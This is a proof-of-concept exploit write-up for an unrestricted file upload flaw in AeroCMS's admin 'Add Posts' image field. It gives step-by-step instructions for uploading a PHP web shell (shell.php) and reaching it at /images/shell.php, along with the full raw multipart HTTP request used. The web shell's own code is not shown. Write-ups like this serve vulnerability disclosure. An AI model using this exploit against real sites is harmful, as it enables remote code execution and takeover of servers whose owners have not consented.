# AeroCMS-Unrestricted-File-Upload-POC # Author: D4rkP0w4r * Description => Upload web shell at Post Image in admin panel ## Step to Reproduct * Login to admin panel -> Posts -> Add Posts -> Post Image -> upload malicious file shell.php -> access /images/shell.php on url -> shell.php page ## Exploit * When upload success access /images/shell.php * Niceeee web shell active # Vulnerable Code * No file checking before uploading # POC * Injection Point ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream * Request POST /AeroCMS/admin/posts.php?source=add_post HTTP/1.1 Host: localhost:8080 Content-Length: 179421 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqOuTjoBBv5W1iXkD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=add_post Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441 Connection: close ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_title" hacked ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_category_id" 2 ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_user" admin ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_status" published ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_tags" 1 ------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="post_content"

11111

------WebKitFormBoundaryqOuTjoBBv5W1iXkD Content-Disposition: form-data; name="create_post" Publish Post ------WebKitFormBoundaryqOuTjoBBv5W1iXkD-- POC VIDEO https://drive.google.com/file/d/1PdF7gTUt_QuU2ObS9YUVew6orHaho-QF/view?usp=sharing